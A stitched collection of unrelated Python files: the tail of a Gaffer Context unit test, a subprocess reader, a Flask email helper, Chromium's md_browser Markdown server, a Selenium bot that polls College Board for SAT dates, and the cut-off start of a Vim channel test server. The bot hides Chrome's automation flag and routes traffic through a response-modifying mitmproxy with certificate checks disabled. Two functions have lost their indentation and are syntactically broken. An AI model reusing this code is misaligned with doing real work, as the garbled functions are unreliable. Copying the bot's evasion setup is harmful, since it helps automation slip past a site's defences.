        # c2 has changed too! with slightly improved performance comes
        # great responsibility!
        self.assertEqual( c2["testInt"], 20 )

        # both contexts reference the same object, but c2 at least owns
        # a reference to its values, and can be used after c1 has been
        # deleted.
        self.assertTrue( c2.get( "testIntVector", _copy=False ).isSame( c1.get( "testIntVector", _copy=False ) ) )
        self.assertEqual( c2.get( "testIntVector", _copy=False ).refCount(), r + 1 )

        del c1

        self.assertEqual( c2["testInt"], 20 )
        self.assertEqual( c2["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
        self.assertEqual( c2.get( "testIntVector", _copy=False ).refCount(), r )

    def testCopyWithBorrowedOwnership( self ) :

        c1 = Gaffer.Context()

        c1["testInt"] = 10
        c1["testIntVector"] = IECore.IntVectorData( [ 10 ] )

        self.assertEqual( c1["testInt"], 10 )
        self.assertEqual( c1["testIntVector"], IECore.IntVectorData( [ 10 ] ) )

        r = c1.get( "testIntVector", _copy=False ).refCount()

        c2 = Gaffer.Context( c1, ownership = Gaffer.Context.Ownership.Borrowed )

        self.assertEqual( c2["testInt"], 10 )
        self.assertEqual( c2["testIntVector"], IECore.IntVectorData( [ 10 ] ) )

        c1["testInt"] = 20
        self.assertEqual( c1["testInt"], 20 )

        # c2 has changed too! with slightly improved performance comes
        # great responsibility!
        self.assertEqual( c2["testInt"], 20 )

        # check that c2 doesn't own a reference
        self.assertTrue( c2.get( "testIntVector", _copy=False ).isSame( c1.get( "testIntVector", _copy=False ) ) )
        self.assertEqual( c2.get( "testIntVector", _copy=False ).refCount(), r )

        # make sure we delete c2 before we delete c1
        del c2

        # check that we're ok to access c1 after deleting c2
        self.assertEqual( c1["testInt"], 20 )
        self.assertEqual( c1["testIntVector"], IECore.IntVectorData( [ 10 ] ) )

    def testSetOnBorrowedContextsDoesntAffectOriginal( self ) :

        c1 = Gaffer.Context()

        c1["testInt"] = 10
        c1["testIntVector"] = IECore.IntVectorData( [ 10 ] )

        c2 = Gaffer.Context( c1, ownership = Gaffer.Context.Ownership.Borrowed )

        c2["testInt"] = 20
        c2["testIntVector"] = IECore.IntVectorData( [ 20 ] )

        self.assertEqual( c1["testInt"], 10 )
        self.assertEqual( c1["testIntVector"], IECore.IntVectorData( [ 10 ] ) )

        self.assertEqual( c2["testInt"], 20 )
        self.assertEqual( c2["testIntVector"], IECore.IntVectorData( [ 20 ] ) )

    def testSetOnSharedContextsDoesntAffectOriginal( self ) :

        c1 = Gaffer.Context()

        c1["testInt"] = 10
        c1["testIntVector"] = IECore.IntVectorData( [ 10 ] )

        c2 = Gaffer.Context( c1, ownership = Gaffer.Context.Ownership.Shared )

        c2["testInt"] = 20
        c2["testIntVector"] = IECore.IntVectorData( [ 20 ] )

        self.assertEqual( c1["testInt"], 10 )
        self.assertEqual( c1["testIntVector"], IECore.IntVectorData( [ 10 ] ) )

        self.assertEqual( c2["testInt"], 20 )
        self.assertEqual( c2["testIntVector"], IECore.IntVectorData( [ 20 ] ) )

    def testSetOnSharedContextsReleasesReference( self ) :

        c1 = Gaffer.Context()

        c1["testIntVector"] = IECore.IntVectorData( [ 10 ] )

        r = c1.get( "testIntVector", _copy=False ).refCount()

        c2 = Gaffer.Context( c1, ownership = Gaffer.Context.Ownership.Shared )
        c2["testIntVector"] = IECore.IntVectorData( [ 20 ] )

        self.assertEqual( c1.get( "testIntVector", _copy=False ).refCount(), r )

    def testHash( self ) :

        c = Gaffer.Context()
        hashes = [ c.hash() ]

        c["test"] = 1
        hashes.append( c.hash() )

        c["test"] = 2
        hashes.append( c.hash() )

        c["test2"] = "test2"
        hashes.append( c.hash() )

        # all hashes so far must be unique
        self.assertEqual( len( hashes ), 4 )
        self.assertEqual( len( set( str( h ) for h in hashes ) ), len( hashes ) )

        c["test2"] = "test2" # no change
        self.assertEqual( c.hash(), hashes[-1] )

    def testChanged( self ) :

        c = Gaffer.Context()
        c["test"] = IECore.StringVectorData( [ "one" ] )
        h = c.hash()

        cs = GafferTest.CapturingSlot( c.changedSignal() )

        d = c.get( "test", _copy = False ) # dangerous! the context won't know if we make changes
        d.append( "two" )
        self.assertEqual( c.get( "test" ), IECore.StringVectorData( [ "one", "two" ] ) )
        self.assertEqual( len( cs ), 0 )

        c.changed( "test" ) # let the context know what we've been up to
        self.assertEqual( len( cs ), 1 )
        self.assertEqual( cs[0], ( c, "test" ) )
        self.assertNotEqual( c.hash(), h )

    def testHashIgnoresUIEntries( self ) :

        c = Gaffer.Context()
        h = c.hash()

        c["ui:test"] = 1
        self.assertEqual( h, c.hash() )

    def testManySubstitutions( self ) :

        GafferTest.testManySubstitutions()

    def testManyEnvironmentSubstitutions( self ) :

        GafferTest.testManyEnvironmentSubstitutions()

    def testEscapedSubstitutions( self ) :

        c = Gaffer.Context()
        c.setFrame( 20 )
        c["a"] = "apple"
        c["b"] = "bear"

        self.assertEqual( c.substitute( "\${a}.\$b" ), "${a}.$b" )
        self.assertEqual( c.substitute( "\~" ), "~" )
        self.assertEqual( c.substitute( "\#\#\#\#" ), "####" )
        # really we're passing \\ to substitute and getting back \ -
        # the extra slashes are escaping for the python interpreter.
        self.assertEqual( c.substitute( "\\\\" ), "\\" )
        self.assertEqual( c.substitute( "\\" ), "" )

        self.assertTrue( c.hasSubstitutions( "\\" ) ) # must return true, because escaping affects substitution
        self.assertTrue( c.hasSubstitutions( "\\\\" ) ) # must return true, because escaping affects substitution

    def testRemove( self ) :

        c = Gaffer.Context()
        c["a"] = "apple"
        c["b"] = "bear"
        c["c"] = "cat"

        h = c.hash()
        self.assertEqual( set( c.names() ), set( [ "a", "b", "c", "frame", "framesPerSecond" ] ) )

        # test Context.remove()
        c.remove( "a" )
        self.assertNotEqual( c.hash(), h )
        self.assertEqual( set( c.names() ), set( [ "b", "c", "frame", "framesPerSecond" ] ) )
        h = c.hash()

        # test Context.__delitem__()
        del c[ "c" ]
        self.assertNotEqual( c.hash(), h )
        self.assertEqual( set( c.names() ), set( [ "b", "frame", "framesPerSecond" ] ) )

        self.assertEqual( c["b"], "bear" )

    def testRemoveMatching( self ) :

        c = Gaffer.Context()
        c["a_1"] = "apple"
        c["a_2"] = "apple"
        c["b_1"] = "bear"
        c["b_2"] = "bear"
        c["c_1"] = "cat"
        c["c_2"] = "cat"

        h = c.hash()
        self.assertEqual( set( c.names() ), set( [ "a_1", "a_2", "b_1", "b_2", "c_1", "c_2", "frame", "framesPerSecond" ] ) )

        # test Context.removeMatching()
        c.removeMatching( "a* c*" )
        self.assertNotEqual( c.hash(), h )
        self.assertEqual( set( c.names() ), set( [ "b_1", "b_2", "frame", "framesPerSecond" ] ) )
        h = c.hash()

    def testContains( self ) :

        c = Gaffer.Context()
        self.assertFalse( "a" in c )
        self.assertTrue( "a" not in c )

        c["a"] = 1
        self.assertTrue( "a" in c )
        self.assertFalse( "a" not in c )

        del c["a"]
        self.assertFalse( "a" in c )
        self.assertTrue( "a" not in c )

    def testTime( self ) :

        c = Gaffer.Context()

        self.assertEqual( c.getFrame(), 1.0 )
        self.assertEqual( c.getFramesPerSecond(), 24.0 )
        self.assertAlmostEqual( c.getTime(), 1.0 / 24.0 )

        c.setFrame( 12.0 )
        self.assertEqual( c.getFrame(), 12.0 )
        self.assertEqual( c.getFramesPerSecond(), 24.0 )
        self.assertAlmostEqual( c.getTime(), 12.0 / 24.0 )

        c.setFramesPerSecond( 48.0 )
        self.assertEqual( c.getFrame(), 12.0 )
        self.assertEqual( c.getFramesPerSecond(), 48.0 )
        self.assertAlmostEqual( c.getTime(), 12.0 / 48.0 )

    def testEditableScope( self ) :

        GafferTest.testEditableScope()
# Allow the test file to be run directly, executing all ContextTest cases.
if __name__ == "__main__":
    unittest.main()
|
proc_reader.py | # -*- coding: utf-8 -*-
#
# Copyright (c) 2019~2999 - Cologler <skyoflw@gmail.com>
# ----------
#
# ----------
from threading import Thread, Lock, Condition
from subprocess import Popen
from queue import Queue
def _read_from_stream(stream, queue: Queue, tag):
def run():
for line in stream:
line: bytes
for x in line.splitlines():
queue.put((tag, x))
queue.put(None)
thread = Thread(target=run)
thread.start()
def yield_from_proc(proc: Popen):
    '''
    yield each `bytes` line from `stdout` and `stderr`.
    ``` py
    for src, line in yield_from_proc(proc):
        if src == 'stdout':
            ... # line is read from stdout
        if src == 'stderr':
            ... # line is read from stderr
    ```
    The process must have been started with piped stdout AND stderr.
    '''
    assert proc.stdout is not None
    assert proc.stderr is not None
    queue = Queue()
    # Each reader enqueues a None sentinel when its stream is exhausted.
    # (The return values were unused in the original, so they are not kept.)
    _read_from_stream(proc.stderr, queue, 'stderr')
    _read_from_stream(proc.stdout, queue, 'stdout')
    finished_readers = 0
    # Stop only after both reader threads have signalled end-of-stream.
    while finished_readers < 2:
        item = queue.get()
        if item is None:
            finished_readers += 1
        else:
            yield item
|
email.py | from flask_mail import Message
from flask import current_app
from app import mail
from threading import Thread
def send_async_email(app, msg):
    """Send *msg* from a worker thread.

    Flask extensions need an application context, which does not exist in a
    background thread, so one is pushed explicitly around the send.
    """
    with app.app_context():
        mail.send(msg)
def send_email(subject, sender, recipients, text_body, html_body):
    """Compose an email and send it asynchronously in a background thread.

    :param subject: message subject line.
    :param sender: "From" address.
    :param recipients: list of recipient addresses.
    :param text_body: plain-text body.
    :param html_body: HTML body.
    """
    msg = Message(subject, sender=sender, recipients=recipients)
    msg.body = text_body
    msg.html = html_body
    # Bug fix: the original referenced an undefined name `app` (NameError at
    # runtime). `current_app` is a context-local proxy that is invalid inside
    # the new thread, so pass the real application object instead.
    Thread(target=send_async_email,
           args=(current_app._get_current_object(), msg)).start()
md_browser.py | #!/usr/bin/env python
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Simple Markdown browser for a Git checkout."""
from __future__ import print_function
import SimpleHTTPServer
import SocketServer
import argparse
import codecs
import os
import re
import socket
import sys
import threading
import time
import webbrowser
from xml.etree import ElementTree
THIS_DIR = os.path.realpath(os.path.dirname(__file__))
SRC_DIR = os.path.dirname(os.path.dirname(THIS_DIR))
sys.path.insert(0, os.path.join(SRC_DIR, 'third_party', 'Python-Markdown'))
import markdown
def main(argv):
  """Parse arguments, start the Markdown server and optionally open a file.

  Returns a process exit code (0/1, or 130 on Ctrl-C).
  """
  parser = argparse.ArgumentParser(prog='md_browser')
  parser.add_argument('-p', '--port', type=int, default=8080,
                      help='port to run on (default = %(default)s)')
  parser.add_argument('-d', '--directory', type=str, default=SRC_DIR)
  parser.add_argument('-e', '--external', action='store_true',
                      help='whether to bind to external port')
  parser.add_argument('file', nargs='?',
                      help='open file in browser')
  args = parser.parse_args(argv)
  top_level = os.path.realpath(args.directory)
  hostname = '0.0.0.0' if args.external else 'localhost'
  server_address = (hostname, args.port)
  s = Server(server_address, top_level)
  origin = 'http://' + hostname
  if args.port != 80:
    origin += ':%s' % args.port
  print('Listening on %s/' % origin)
  thread = None
  if args.file:
    # Refuse to open files outside the served directory.
    path = os.path.realpath(args.file)
    if not path.startswith(top_level):
      print('%s is not under %s' % (args.file, args.directory))
      return 1
    rpath = os.path.relpath(path, top_level)
    url = '%s/%s' % (origin, rpath)
    print('Opening %s' % url)
    # Open the browser from a helper thread so serve_forever() below can
    # start accepting the request it will generate.
    thread = threading.Thread(target=_open_url, args=(url,))
    thread.start()
  elif os.path.isfile(os.path.join(top_level, 'docs', 'README.md')):
    print(' Try loading %s/docs/README.md' % origin)
  elif os.path.isfile(os.path.join(args.directory, 'README.md')):
    print(' Try loading %s/README.md' % origin)
  retcode = 1
  try:
    s.serve_forever()
  except KeyboardInterrupt:
    # Conventional exit code for SIGINT.
    retcode = 130
  except Exception as e:
    print('Exception raised: %s' % str(e))
  s.shutdown()
  if thread:
    thread.join()
  return retcode
def _open_url(url):
  """Open *url* in the default browser after a short delay.

  The delay gives the HTTP server a moment to start accepting connections.
  """
  startup_grace_secs = 1
  time.sleep(startup_grace_secs)
  webbrowser.open(url)
def _gitiles_slugify(value, _separator):
"""Convert a string (representing a section title) to URL anchor name.
This function is passed to "toc" extension as an extension option, so we
can emulate the way how Gitiles converts header titles to URL anchors.
Gitiles' official documentation about the conversion is at:
https://gerrit.googlesource.com/gitiles/+/master/Documentation/markdown.md#Named-anchors
Args:
value: The name of a section that is to be converted.
_separator: Unused. This is actually a configurable string that is used
as a replacement character for spaces in the title, typically set to
'-'. Since we emulate Gitiles' way of slugification here, it makes
little sense to have the separator charactor configurable.
"""
# TODO(yutak): Implement accent removal. This does not seem easy without
# some library. For now we just make accented characters turn into
# underscores, just like other non-ASCII characters.
value = value.encode('ascii', 'replace') # Non-ASCII turns into '?'.
value = re.sub(r'[^- a-zA-Z0-9]', '_', value) # Non-alphanumerics to '_'.
value = value.replace(u' ', u'-')
value = re.sub(r'([-_])[-_]+', r'\1', value) # Fold hyphens and underscores.
return value
class Server(SocketServer.TCPServer):
  """TCP server that serves rendered Markdown rooted at `top_level`."""

  def __init__(self, server_address, top_level):
    SocketServer.TCPServer.__init__(self, server_address, Handler)
    # Root directory; Handler refuses to serve anything outside it.
    self.top_level = top_level

  def server_bind(self):
    # SO_REUSEADDR allows quick restarts without waiting out TIME_WAIT.
    # NOTE(review): unlike TCPServer.server_bind, this override does not
    # refresh self.server_address from getsockname(); fine here because the
    # port is always given explicitly, but confirm before binding to port 0.
    self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    self.socket.bind(self.server_address)
class Handler(SimpleHTTPServer.SimpleHTTPRequestHandler):
  """Request handler that renders Markdown files roughly like Gitiles."""

  def do_GET(self):
    path = self.path

    # strip off the repo and branch info, if present, for compatibility
    # with gitiles.
    if path.startswith('/chromium/src/+/master'):
      path = path[len('/chromium/src/+/master'):]

    full_path = os.path.realpath(os.path.join(self.server.top_level, path[1:]))

    if not full_path.startswith(self.server.top_level):
      # NOTE(review): a plain prefix check also admits '/foo_evil' for a
      # top_level of '/foo'; consider comparing against top_level + os.sep.
      self._DoUnknown()
    elif path in ('/base.css', '/doc.css', '/prettify.css'):
      self._DoCSS(path[1:])
    elif not os.path.exists(full_path):
      self._DoNotFound()
    elif path.lower().endswith('.md'):
      self._DoMD(path)
    elif os.path.exists(full_path + '/README.md'):
      self._DoMD(path + '/README.md')
    elif path.lower().endswith('.png'):
      self._DoImage(full_path, 'image/png')
    elif path.lower().endswith('.jpg'):
      self._DoImage(full_path, 'image/jpeg')
    elif os.path.isdir(full_path):
      self._DoDirListing(full_path)
    elif os.path.exists(full_path):
      self._DoRawSourceFile(full_path)
    else:
      self._DoUnknown()

  def _DoMD(self, path):
    """Render a Markdown file as HTML using Gitiles-compatible extensions."""
    extensions = [
        'markdown.extensions.def_list',
        'markdown.extensions.fenced_code',
        'markdown.extensions.tables',
        'markdown.extensions.toc',
        'gitiles_autolink',
        'gitiles_ext_blocks',
        'gitiles_smart_quotes',
    ]
    extension_configs = {
        'markdown.extensions.toc': {
            'slugify': _gitiles_slugify
        },
    }

    contents = self._Read(path[1:])

    md = markdown.Markdown(extensions=extensions,
                           extension_configs=extension_configs,
                           tab_length=2,
                           output_format='html4')

    # A document with exactly one H1 treats it as the title; _AdjustTOC then
    # drops it from the generated table of contents.
    has_a_single_h1 = (len([line for line in contents.splitlines()
                            if (line.startswith('#') and
                                not line.startswith('##'))]) == 1)

    md.treeprocessors['adjust_toc'] = _AdjustTOC(has_a_single_h1)

    md_fragment = md.convert(contents).encode('utf-8')

    # (The original wrapped this in a no-op `try: ... except: raise`.)
    self._WriteHeader('text/html')
    self._WriteTemplate('header.html')
    self.wfile.write('<div class="doc">')
    self.wfile.write(md_fragment)
    self.wfile.write('</div>')
    self._WriteTemplate('footer.html')

  def _DoRawSourceFile(self, full_path):
    """Serve a non-Markdown text file as an HTML table of numbered lines."""
    self._WriteHeader('text/html')
    self._WriteTemplate('header.html')
    self.wfile.write('<table class="FileContents">')

    with open(full_path) as fp:
      # Escape html over the entire file at once. Bug fix: the original
      # replaced each character with itself (the entity names were lost),
      # so markup in served files corrupted the generated page.
      data = fp.read().replace(
          '&', '&amp;').replace(
          '<', '&lt;').replace(
          '>', '&gt;').replace(
          '"', '&quot;')

    # start=1 so displayed line numbers and anchors are 1-based.
    for i, line in enumerate(data.splitlines(), start=1):
      self.wfile.write(
          ('<tr class="u-pre u-monospace FileContents-line">'
           '<td class="u-lineNum u-noSelect FileContents-lineNum">'
           '<a name="%(num)s" '
           'onclick="window.location.hash=%(quot)s#%(num)s%(quot)s">'
           '%(num)s</a></td>'
           '<td class="FileContents-lineContents">%(line)s</td></tr>')
          % {'num': i, 'quot': "'", 'line': line})

    self.wfile.write('</table>')
    self._WriteTemplate('footer.html')

  def _DoCSS(self, template):
    self._WriteHeader('text/css')
    self._WriteTemplate(template)

  def _DoNotFound(self):
    self._WriteHeader('text/html', status_code=404)
    self.wfile.write('<html><body>%s not found</body></html>' % self.path)

  def _DoUnknown(self):
    self._WriteHeader('text/html', status_code=501)
    self.wfile.write('<html><body>I do not know how to serve %s.</body>'
                     '</html>' % self.path)

  def _DoDirListing(self, full_path):
    """List the files then subdirectories of one directory (Markdown bolded)."""
    self._WriteHeader('text/html')
    self._WriteTemplate('header.html')
    self.wfile.write('<div class="doc">')
    self.wfile.write('<div class="Breadcrumbs">\n')
    self.wfile.write('<a class="Breadcrumbs-crumb">%s</a>\n' % self.path)
    self.wfile.write('</div>\n')

    # os.walk is only used for its first tuple; `break` below stops descent.
    for _, dirs, files in os.walk(full_path):
      for f in sorted(files):
        if f.startswith('.'):
          continue
        if f.endswith('.md'):
          bold = ('<b>', '</b>')
        else:
          bold = ('', '')
        self.wfile.write('<a href="%s/%s">%s%s%s</a><br/>\n' %
                         (self.path.rstrip('/'), f, bold[0], f, bold[1]))
      self.wfile.write('<br/>\n')
      for d in sorted(dirs):
        if d.startswith('.'):
          continue
        self.wfile.write('<a href="%s/%s">%s/</a><br/>\n' %
                         (self.path.rstrip('/'), d, d))
      break
    self.wfile.write('</div>')
    self._WriteTemplate('footer.html')

  def _DoImage(self, full_path, mime_type):
    self._WriteHeader(mime_type)
    # Bug fix: open in binary mode; text mode corrupts image bytes on
    # Windows and fails outright under Python 3. (The redundant close()
    # inside the with-block is also gone.)
    with open(full_path, 'rb') as f:
      self.wfile.write(f.read())

  def _Read(self, relpath, relative_to=None):
    """Return the UTF-8 decoded contents of `relpath` under `relative_to`."""
    if relative_to is None:
      relative_to = self.server.top_level
    assert not relpath.startswith(os.sep)
    path = os.path.join(relative_to, relpath)
    with codecs.open(path, encoding='utf-8') as fp:
      return fp.read()

  def _WriteHeader(self, content_type='text/plain', status_code=200):
    self.send_response(status_code)
    self.send_header('Content-Type', content_type)
    self.end_headers()

  def _WriteTemplate(self, template):
    # Templates live with this tool's source, not under the served tree.
    contents = self._Read(os.path.join('tools', 'md_browser', template),
                          relative_to=SRC_DIR)
    self.wfile.write(contents.encode('utf-8'))
class _AdjustTOC(markdown.treeprocessors.Treeprocessor):
  """Tree processor that reshapes the toc extension's output for Gitiles."""

  def __init__(self, has_a_single_h1):
    super(_AdjustTOC, self).__init__()
    # True when the document's only H1 is its title (to be dropped from TOC).
    self.has_a_single_h1 = has_a_single_h1

  def run(self, tree):
    # Given
    #
    #    # H1
    #
    #    [TOC]
    #
    #    ## first H2
    #
    #    ## second H2
    #
    # the markdown.extensions.toc extension generates:
    #
    #    <div class='toc'>
    #      <ul><li><a>H1</a>
    #        <ul><li>first H2
    #            <li>second H2</li></ul></li><ul></div>
    #
    # for [TOC]. But, we want the TOC to have its own subheading, so
    # we rewrite <div class='toc'><ul>...</ul></div> to:
    #
    #    <div class='toc'>
    #      <h2>Contents</h2>
    #      <div class='toc-aux'>
    #        <ul>...</ul></div></div>
    #
    # In addition, if the document only has a single H1, it is usually the
    # title, and we don't want the title to be in the TOC. So, we remove it
    # and shift all of the title's children up a level, leaving:
    #
    #    <div class='toc'>
    #      <h2>Contents</h2>
    #      <div class='toc-aux'>
    #        <ul><li>first H2
    #            <li>second H2</li></ul></div></div>
    for toc_node in tree.findall(".//*[@class='toc']"):
      toc_ul = toc_node[0]
      if self.has_a_single_h1:
        # Drop the single H1 entry; its nested <ul> becomes the TOC body.
        toc_ul_li = toc_ul[0]
        ul_with_the_desired_toc_entries = toc_ul_li[1]
      else:
        ul_with_the_desired_toc_entries = toc_ul
      toc_node.remove(toc_ul)
      contents = ElementTree.SubElement(toc_node, 'h2')
      contents.text = 'Contents'
      contents.tail = '\n'
      toc_aux = ElementTree.SubElement(toc_node, 'div', {'class': 'toc-aux'})
      toc_aux.text = '\n'
      toc_aux.append(ul_with_the_desired_toc_entries)
      toc_aux.tail = '\n'
if __name__ == '__main__':
  # Strip the program name before handing argv to main().
  sys.exit(main(sys.argv[1:]))
|
RegisMaster.py | import threading
import os
from selenium import webdriver
from selenium.webdriver import ChromeOptions
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from datetime import datetime
from playsound import playsound
import time
import random
def os_mitmproxy():
    """Launch mitmdump (blocking) with the response-modifying addon.

    NOTE(review): the working directory and upstream proxy address are
    hard-coded to one machine's setup — confirm before reuse.
    """
    os.chdir('C:/Users/97262/PycharmProjects/RegisMaster')
    os.system('mitmdump --mode upstream:127.0.0.1:7890 -s Modify_Response.py')
def refresh_driver(driver):
    """Reload the page twice, pausing a random few seconds after each reload."""
    for _ in range(2):
        driver.refresh()
        time.sleep(random.randint(3, 8))
def reboot_main_program(driver):
    """Close the browser, wait 10-20 minutes, then restart the whole flow.

    NOTE(review): this calls main_program() recursively, so repeated
    failures grow the call stack without bound.
    """
    driver.close()
    time.sleep(random.randint(600, 1200))
    main_program()
def error001(driver):
    """Recover from the College Board "system error" page and resume the flow.

    Checks the rendered page for the error banner, clicks the "try again"
    link and replays the registration steps; any failure falls back to a
    full restart via reboot_main_program().
    """
    html = str(driver.execute_script("return document.documentElement.outerHTML"))
    # Bug fix: the original condition was `"...system error." and "..." in html`,
    # where the first string is just a truthy literal — only the second
    # membership test was ever evaluated. Both substrings are now required.
    if ("We are unable to process your request due to a system error." in html
            and "Please try again later." in html):
        refresh_driver(driver)
        again = WebDriverWait(driver, 120).until(
            EC.element_to_be_clickable((By.XPATH, "/html/body/div/div[1]/div[1]/div/div/ul/li/a")))
        again.click()
        time.sleep(random.randint(5, 15))
        try:
            iteration(actionRegisterAnother(driver), driver)
            iteration(authenticatePage(driver), driver)
            iteration(Continue001(driver), driver)
            iteration(updateLater(driver), driver)
            iteration(agreeTerms(driver), driver)
            iteration(Continue002(driver), driver)
            iteration(inspect_future_SAT(driver), driver)
        except Exception:
            reboot_main_program(driver)
def error002(driver):
    """Recover from an unexpected sign-in page and resume the flow.

    If the session was dropped back to the login screen, log in again and
    replay the registration steps; any failure restarts via
    reboot_main_program().
    """
    html = str(driver.execute_script("return document.documentElement.outerHTML"))
    # Bug fix: as in error001, `"A" and "B" in html` only tested the second
    # substring; both markers of the login page are now required.
    if "Please sign in." in html and "Welcome back." in html:
        try:
            iteration(error2_login(driver), driver)
            iteration(actionRegisterAnother(driver), driver)
            iteration(authenticatePage(driver), driver)
            iteration(Continue001(driver), driver)
            iteration(updateLater(driver), driver)
            iteration(agreeTerms(driver), driver)
            iteration(Continue002(driver), driver)
            iteration(inspect_future_SAT(driver), driver)
        except Exception:
            reboot_main_program(driver)
def iteration(program, driver):
    """Retry ladder: on failure refresh the page, then try the two error
    handlers, and finally restart everything.

    NOTE(review): every call site passes `someStep(driver)` — the step has
    already executed (and raised, if it was going to) before iteration() is
    entered, so the bare `program` expressions below are no-ops and the
    "retry" only reacts to exceptions raised by refresh_driver/error001/
    error002 themselves. Fixing this requires passing callables (e.g.
    lambdas) at every call site.
    """
    try:
        time.sleep(5)
        program
    except:
        try:
            refresh_driver(driver)
            program
            time.sleep(random.randint(5, 15))
        except:
            try:
                error001(driver)
            except:
                try:
                    error002(driver)
                except:
                    reboot_main_program(driver)
def get_collegeboard_website(driver):
    """Open the College Board SAT landing page and idle for a random delay."""
    driver.get('https://collegereadiness.collegeboard.org/')
    pause_secs = random.randint(5, 15)
    time.sleep(pause_secs)
def login(driver):
    """Sign in to collegeboard.org via the landing page's sign-in form.

    NOTE(review): "USERNAME"/"PASSWORD" are placeholders that must be
    replaced with real credentials; the absolute XPaths below break on any
    page redesign.
    """
    sign_in = WebDriverWait(driver, 120).until(
        EC.element_to_be_clickable((By.XPATH, "/html/body/div[1]/div[1]/div/div/div/div[1]/div/div[2]/div/a[1]")))
    sign_in.click()
    user_name = WebDriverWait(driver, 120).until(EC.element_to_be_clickable((By.XPATH,
        "/html/body/div[1]/div[1]/div/div/div[2]/div[3]/div/div/div/div/div/div[1]/div/div[2]/form/div[1]/input")))
    user_name.send_keys("USERNAME")
    password = WebDriverWait(driver, 120).until(EC.element_to_be_clickable((By.XPATH,
        "/html/body/div[1]/div[1]/div/div/div[2]/div[3]/div/div/div/div/div/div[1]/div/div[2]/form/div[2]/input")))
    password.send_keys("PASSWORD")
    submit = WebDriverWait(driver, 120).until(EC.element_to_be_clickable(
        (By.XPATH, "/html/body/div[1]/div[1]/div/div/div[2]/div[3]/div/div/div/div/div/div[1]/div/div[2]/form/button")))
    submit.click()
    time.sleep(random.randint(5, 15))
def error2_login(driver):
    """Re-authenticate on the standalone "Welcome back" sign-in page.

    Same placeholder-credential caveat as login(); the form lives at
    different XPaths than the landing-page form.
    """
    user_name = WebDriverWait(driver, 120).until(EC.element_to_be_clickable((By.XPATH,
        "/html/body/div/div[3]/div/div/div[1]/div/div/div[2]/div/div/div/div/form/div[1]/div[1]/div[2]/input")))
    user_name.send_keys("USERNAME")
    password = WebDriverWait(driver, 120).until(EC.element_to_be_clickable((By.XPATH,
        "/html/body/div/div[3]/div/div/div[1]/div/div/div[2]/div/div/div/div/form/div[1]/div[2]/div[2]/input")))
    password.send_keys("PASSWORD")
    submit = WebDriverWait(driver, 120).until(EC.element_to_be_clickable((By.XPATH,
        "/html/body/div/div[3]/div/div/div[1]/div/div/div[2]/div/div/div/div/form/div[3]/div[1]/button")))
    submit.click()
    time.sleep(random.randint(5, 15))
def get_collegeboard_registration_website(driver):
    """Navigate directly to the SAT registration home action."""
    registration_url = "https://nsat.collegeboard.org/satweb/satHomeAction.action"
    driver.get(registration_url)
def actionRegisterAnother(driver):
    """Click the "register another" button once it becomes clickable."""
    wait = WebDriverWait(driver, 120)
    wait.until(EC.element_to_be_clickable((By.ID, "actionRegisterAnother"))).click()
def authenticatePage(driver):
    """Click the authentication confirmation button once it becomes clickable."""
    wait = WebDriverWait(driver, 120)
    wait.until(EC.element_to_be_clickable((By.ID, "authenticatePage"))).click()
def Continue001(driver):
    """Click the first "continue" button of the registration wizard."""
    wait = WebDriverWait(driver, 120)
    wait.until(EC.element_to_be_clickable((By.ID, "continue"))).click()
def updateLater(driver):
    """Dismiss the profile-update prompt via its "update later" button."""
    wait = WebDriverWait(driver, 120)
    wait.until(EC.element_to_be_clickable((By.ID, "updateLater"))).click()
def agreeTerms(driver):
    """Accept the terms and conditions by clicking the agree button."""
    wait = WebDriverWait(driver, 120)
    wait.until(EC.element_to_be_clickable((By.ID, "agreeTerms"))).click()
def Continue002(driver):
    """Click the second "continue" button of the registration wizard."""
    wait = WebDriverWait(driver, 120)
    wait.until(EC.element_to_be_clickable((By.ID, "continue"))).click()
def inspect_future_SAT(driver):
    """Poll the registration page until a future SAT date becomes available.

    When the "no available registration dates" banner is present the event
    is logged; once it disappears the alarm sound loops forever to alert
    the operator. Otherwise the page is revisited every 5-6 minutes.
    """
    while True:
        WebDriverWait(driver, 120).until(EC.element_to_be_clickable((By.ID, "cancelBtn")))
        html = str(driver.execute_script("return document.documentElement.outerHTML"))
        if "There are no available registration dates for the current test year. Please check back later to register for future tests." in html:
            with open('LOG.txt', 'a') as LOG:
                LOG.write('\n' + datetime.now().strftime('%Y-%m-%d %H:%M:%S') + ": " + "Future SAT NOT Available!")
        # NOTE(review): this elif is the exact negation of the branch above,
        # so a plain `else` would be equivalent.
        elif "There are no available registration dates for the current test year. Please check back later to register for future tests." not in html:
            while True:
                # Deliberately never exits — keeps ringing until stopped.
                playsound("Alarm01.wav")
        time.sleep(random.randint(300, 350))
        driver.back()
        refresh_driver(driver)
        iteration(agreeTerms(driver), driver)
        iteration(Continue002(driver), driver)
def main_program():
    """Launch Chrome through the local mitmproxy and run the registration flow."""
    options = ChromeOptions()
    # Hide the "Chrome is being controlled by automated software" banner.
    options.add_experimental_option('excludeSwitches', ['enable-automation'])
    # mitmproxy presents its own CA, so certificate errors must be ignored.
    options.add_argument('--ignore-certificate-errors')
    options.add_argument('--start-maximized')
    # Route traffic through the mitmdump instance started by os_mitmproxy().
    options.add_argument('--proxy-server=127.0.0.1:8080')
    driver = webdriver.Chrome(options=options)
    try:
        iteration(get_collegeboard_website(driver), driver)
        iteration(login(driver), driver)
        iteration(get_collegeboard_registration_website(driver), driver)
        iteration(actionRegisterAnother(driver), driver)
        iteration(authenticatePage(driver), driver)
        iteration(Continue001(driver), driver)
        iteration(updateLater(driver), driver)
        iteration(agreeTerms(driver), driver)
        iteration(Continue002(driver), driver)
        iteration(inspect_future_SAT(driver), driver)
    except:
        reboot_main_program(driver)
# Run the mitmproxy interceptor and the browser automation side by side;
# the proxy gets a 5 second head start so Chrome can connect through it.
thread_001 = threading.Thread(target=os_mitmproxy)
thread_002 = threading.Thread(target=main_program)
thread_001.start()
time.sleep(5)
thread_002.start()
|
test_channel.py | #!/usr/bin/python
#
# Server that will accept connections from a Vim channel.
# Used by test_channel.vim.
#
# This requires Python 2.6 or later.
from __future__ import print_function
import json
import socket
import sys
import time
import threading
try:
# Python 3
import socketserver
except ImportError:
# Python 2
import SocketServer as socketserver
